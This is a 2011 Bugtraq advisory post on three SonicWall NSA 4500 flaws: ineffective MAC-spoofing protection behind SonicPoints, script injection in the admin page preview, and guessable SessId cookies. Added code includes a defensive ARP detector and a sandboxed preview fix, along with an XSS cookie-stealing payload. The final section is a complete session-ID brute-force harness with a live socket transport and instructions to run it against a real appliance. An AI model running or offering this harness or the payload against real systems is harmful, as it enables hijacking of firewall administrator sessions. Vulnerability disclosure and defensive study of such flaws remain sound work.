Multiple vulnerabilities in SonicWall
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple vulnerabilities in SonicWall
- From: hvazquez@xxxxxxxxxx
- Date: Tue, 4 Oct 2011 11:20:03 GMT
While pentesting a customer's WiFi network, we found some vulnerabilities
in the SonicWall NSA 4500. You can find details here:
http://www.pentest.es/vulns_sonicpoint.txt
--------------------------------------------------
Title:
======
SonicWall products with incompatible MAC spoofing protection
Date:
=====
2011-09-29
Introduction:
=============
The SonicWall NSA 4500 has a MAC spoofing protection option that can be
enabled for wireless networks on a per-ESSID basis. This protection does not
work when the access point is a SonicPoint. No warning or notice is presented
to the administrator, which means the protection shows as active but is not
enforced. This vulnerability was detected while pentesting a customer WiFi
deployment with that configuration: SonicWall NSA 4500 + SonicWall SonicPoints.
Report-Timeline:
================
2011-09-26: Vendor Notification
2011-09-28: Vendor Final Response
The vendor has confirmed the bug via customer support response.
Affected Products:
==================
SonicWall NSA 4500 + SonicWall Sonicpoints
Exploitation-Technique:
=======================
Common ARP spoofing attacks.
Severity:
=========
High. Customers do not know they are unprotected even though they have MAC
spoofing protection enabled.
Details:
========
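Because the appliance gives no indication that the per-ESSID protection is
inactive behind SonicPoints, the practical compensating control is to watch
the segment for the ARP spoofing the protection was supposed to stop. The
following is an added example (not from the advisory and not SonicWall code):
it parses `tcpdump -n arp` style output and flags any IP that is answered for
by more than one MAC. The capture lines, addresses and MACs are constructed.

```python
"""ARP conflict detector for a WiFi segment where the firewall's MAC spoofing
protection is silently ineffective (added example, not from the advisory).

Input is tcpdump-style ARP output; the sample lines below are constructed."""
import re

# Constructed sample in `tcpdump -n arp` output format: the gateway 10.0.0.1
# is answered for by two different MACs.
SAMPLE_TCPDUMP_LINES = """\
12:00:01.000000 ARP, Request who-has 10.0.0.1 tell 10.0.0.23, length 28
12:00:01.000400 ARP, Reply 10.0.0.1 is-at 00:11:22:33:44:55, length 28
12:00:02.000000 ARP, Reply 10.0.0.23 is-at aa:bb:cc:dd:ee:01, length 28
12:00:03.500000 ARP, Reply 10.0.0.1 is-at 00:11:22:33:44:55, length 28
12:00:04.200000 ARP, Reply 10.0.0.1 is-at de:ad:be:ef:00:01, length 28
12:00:05.000000 ARP, Reply 10.0.0.23 is-at aa:bb:cc:dd:ee:01, length 28
12:00:06.000000 ARP, Reply 10.0.0.1 is-at 00:11:22:33:44:55, length 28
"""

ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at "
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})")


def parse_arp_replies(text):
    """Yield (timestamp, ip, mac) for each ARP Reply line; requests are skipped."""
    for line in text.splitlines():
        m = ARP_REPLY_RE.match(line)
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()


def detect_arp_conflicts(replies, trusted=None):
    """Return a list of (timestamp, ip, expected_mac, seen_mac) alerts.

    trusted: optional {ip: mac} of static bindings (typically the gateway).
    Trusted bindings are never overwritten, so every reply contradicting them
    is reported. Other IPs are tracked dynamically, so each MAC change
    (including the real host answering again) produces its own alert."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    current = dict(trusted)
    alerts = []
    for ts, ip, mac in replies:
        known = current.get(ip)
        if known is not None and known != mac:
            alerts.append((ts, ip, known, mac))
        if ip not in trusted:
            current[ip] = mac
    return alerts


if __name__ == "__main__":
    replies = parse_arp_replies(SAMPLE_TCPDUMP_LINES)
    for ts, ip, expected, seen in detect_arp_conflicts(
            replies, trusted={"10.0.0.1": "00:11:22:33:44:55"}):
        print("ARP conflict at %s: %s claimed by %s, expected %s"
              % (ts, ip, seen, expected))
```

Feed it live output (`tcpdump -n -l arp`) instead of the sample to run it
against a real segment; pinning the gateway in `trusted` is what turns a
noisy "MAC changed" log into a reliable "someone is claiming the gateway"
alert.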
--------------------------------------------------
Title:
======
SonicWall web admin interface multiple code injection vulnerabilities
Date:
=====
2011-09-29
Introduction:
=============
The SonicWall NSA 4500 web admin interface offers the option of customizing
some web pages directly from the admin interface. For this, the web interface
has forms where the admin can enter the code and test it via a preview feature.
This preview feature renders the page and executes all the JavaScript code
inside it in the web admin security context, which leads to many traditional
attacks, like XSS, session hijacking...
Report-Timeline:
================
Not reported.
Affected Products:
==================
SonicWall NSA 4500
Exploitation-Technique:
=======================
Common code injection techniques (XSS)
Severity:
=========
Medium.
Details:
========
To reproduce the flaw, go to main.html, Users->Settings and, in the "Login
page content" field, enter whatever code you want; it will be executed in the
admin context. This behaviour is a dangerous feature of the web admin
interface, because it can be exploited and triggered in several ways by an
attacker. Fields other than "Login page content" can be exploited in the same
way.
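The root problem is not that the field accepts HTML (that is its purpose) but
that the preview renders it inside the admin-origin document, so any script in
the draft inherits the admin session. As an added example (not SonicWall code;
the field name, draft and function names are constructed), here is the
inlining pattern the advisory describes beside one way to preview the same
draft without giving it the admin context: an iframe with an empty `sandbox`
attribute, which blocks scripts and gives the frame an opaque origin.

```python
"""Preview rendering for admin-editable page content: the inlining pattern the
advisory describes beside a sandboxed alternative (added example, not SonicWall
code; the draft below is constructed)."""
import html

# Constructed draft for the "Login page content" field. Rendered inline, the
# script runs with the admin's cookies and session.
DRAFT_LOGIN_PAGE = '<h1>Corporate login</h1><script>alert(document.cookie)</script>'


def render_preview_vulnerable(draft):
    """Inline the draft into a page served from the admin origin. Any script
    in it executes in the admin security context (the behaviour reported)."""
    return "<html><body>" + draft + "</body></html>"


def render_preview_sandboxed(draft):
    """Show the draft inside an iframe with an empty sandbox attribute: script
    execution is disabled and the frame gets an opaque origin, so even a
    script that did run could not reach the admin document or its cookies.
    The draft is HTML-escaped so it cannot terminate the srcdoc attribute;
    the browser unescapes it again when it parses the frame content."""
    return ('<html><body><iframe sandbox="" referrerpolicy="no-referrer" '
            'srcdoc="%s"></iframe></body></html>'
            % html.escape(draft, quote=True))


def has_inline_script(page):
    """Check used in the demo: does the admin-origin document itself carry a
    raw <script> tag (as opposed to an escaped one inside an attribute)?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for name, render in (("inline", render_preview_vulnerable),
                         ("sandboxed", render_preview_sandboxed)):
        page = render(DRAFT_LOGIN_PAGE)
        print("%-9s script in admin context: %s" % (name, has_inline_script(page)))
```

A stricter variant serves the preview from a separate hostname so that even
browsers without `sandbox` support cannot hand the draft the admin's cookies;
either way the draft must never be concatenated into the admin page itself.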
--------------------------------------------------
Title:
======
SonicWall weak HTTP session IDs
Date:
=====
2011-09-29
Introduction:
=============
The SonicWall NSA 4500 web admin interface generates session IDs that are
stored in the "SessId" cookie. The IDs are guessable via brute force, which
leads to admin session hijacking.
Report-Timeline:
================
Not reported.
Affected Products:
==================
SonicWall NSA 4500
Exploitation-Technique:
=======================
To brute force, just make requests like this:
GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111
Where SessId is the cookie value being brute-forced (it should change on
every request) and Host is the SonicWall IP.
If you fail you get a 404 HTTP response. If you succeed, you get a 200 HTTP
response and will see the SonicWall logs.
Severity:
=========
Medium.
Details:
========
HTTP "SessId" brute force. From a LAN, 10% of all IDs can be brute-forced in
1 day. The more administrators are logged in, the more dangerous the scenario
and the easier the brute-force attack: every live session is another valid
value in the same ID space, so the expected number of guesses before the first
hit shrinks accordingly.
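The request above and the "more admins, easier attack" remark translate
directly into code. The following is an added example (not from the advisory):
a brute-force harness that builds exactly that request, classifies the
200/404 answer, and stops on the first hit, plus the arithmetic for how many
guesses a sweep needs on average. It assumes SessId is a 9-digit decimal value
as the sample cookie suggests (the advisory does not state the keyspace); the
target address, the fake transport and the "live" session in it are
constructed so the block runs offline.

```python
"""SessId brute-force harness for the request shown above, plus the arithmetic
behind "more logged-in admins means an easier attack" (added example, not from
the advisory). Assumptions: SessId is a 9-digit decimal value, as the sample
cookie suggests (the advisory does not state the keyspace); the target and the
fake transport below are constructed."""
import socket


def build_request(host, sessid, path="/log.wri"):
    """Raw HTTP/1.0 request carrying one candidate SessId (format from the advisory)."""
    return ("GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n"
            "User-Agent: brute-forcing\r\nCookie: SessId=%s\r\n\r\n"
            % (path, host, sessid))


def is_hit(response):
    """200 means the cookie matched a live admin session; 404 means it did not."""
    parts = response.split("\r\n", 1)[0].split()
    return len(parts) >= 2 and parts[0].startswith("HTTP/1.") and parts[1] == "200"


def candidate_ids(digits=9, start=0):
    """Zero-padded decimal candidates (assumption: SessId is 9 decimal digits)."""
    for n in range(start, 10 ** digits):
        yield "%0*d" % (digits, n)


def brute_force(host, candidates, send, max_attempts=None):
    """Try candidates until one yields 200. `send(request)` returns the raw
    response text. Returns (sessid, attempts) or (None, attempts)."""
    attempts = 0
    for sessid in candidates:
        if max_attempts is not None and attempts >= max_attempts:
            break
        attempts += 1
        if is_hit(send(build_request(host, sessid))):
            return sessid, attempts
    return None, attempts


def expected_attempts(keyspace, live_sessions):
    """Expected guesses until the first live session is hit when sweeping
    `keyspace` IDs without repetition and sessions are uniformly random:
    (K + 1) / (N + 1). Nine admins instead of one cuts it roughly fivefold."""
    return (keyspace + 1) / (live_sessions + 1)


def fraction_swept(rate_per_second, seconds, keyspace):
    """Share of the keyspace covered at a sustained request rate."""
    return min(1.0, rate_per_second * seconds / keyspace)


def socket_send(host, port=80, timeout=5):
    """Real transport for `brute_force` (not used by the offline demo)."""
    def send(request):
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request.encode("ascii"))
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks).decode("latin-1")
    return send


# Constructed offline stand-in for the appliance: one live admin session.
VALID_SESSIONS = {"000004242"}


def fake_send(request):
    cookie = [l for l in request.split("\r\n") if l.startswith("Cookie: SessId=")][0]
    if cookie[len("Cookie: SessId="):] in VALID_SESSIONS:
        return "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html>logs...</html>"
    return "HTTP/1.0 404 Not Found\r\nConnection: close\r\n\r\n"


if __name__ == "__main__":
    found, tries = brute_force("192.0.2.1", candidate_ids(), fake_send)
    print("hit %s after %d requests" % (found, tries))
    # With 10^9 IDs, the advisory's 10%/day corresponds to ~1157 req/s; one
    # admin session is expected after ~5e8 guesses, nine sessions after ~1e8.
    print(expected_attempts(10 ** 9, 1), expected_attempts(10 ** 9, 9),
          fraction_swept(1157, 86400, 10 ** 9))
```

Swap `fake_send` for `socket_send("<appliance ip>")` to run it for real; the
`max_attempts` limit and the `start` offset let several workers split the
space, which is how the LAN throughput figure above is reached in practice.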
--------------------------------------------------
info@xxxxxxxxxx
Hugo Vázquez Caramés
PENTEST Consultores